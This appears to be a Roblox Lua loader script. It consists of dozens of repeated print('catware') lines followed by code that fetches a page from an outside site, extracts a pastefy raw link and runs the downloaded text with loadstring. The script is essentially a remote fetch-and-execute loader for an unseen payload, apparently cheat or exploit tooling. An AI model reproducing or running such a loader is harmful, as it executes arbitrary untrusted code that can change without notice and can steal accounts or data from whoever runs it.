print("catware")
print("catware")
print("catware")
print("catware")
print("catware")
print("catware")
print("catware")
print("catware")
print("catware")
print("catware")
print("catware")
print("catware")
print("catware")
print("catware")
print("catware")
print("catware")
print("catware")
print("catware")
print("catware")
print("catware")
print("catware")
print("catware")
print("catware")
print("catware")
print("catware")
print("catware")
print("catware")
print("catware")
print("catware")
print("catware")
print("catware")
print("catware")
print("catware")
print("catware")
print("catware")
print("catware")
print("catware")
print("catware")
print("catware")
print("catware")
print("catware")
print("catware")
print("catware")
print("catware")
print("catware")
print("catware")
print("catware")
print("catware")
print("catware")
print("catware")
print("catware")
print("catware")
print("catware")
print("catware")
print("catware")
print("catware")
print("catware")
print("catware")
print("catware")
print("catware")
print("catware")
print("catware")
print("catware")
print("catware")
print("catware")
print("catware")
print("catware")

local content = game:HttpGet("https://zonefn.us/lua.html")

local rawUrl = content:match("(https://pastefy%.app/[%w]+/raw)")

if rawUrl then
    loadstring(game:HttpGet(rawUrl))()
else
    warn("error, report in discord")
end
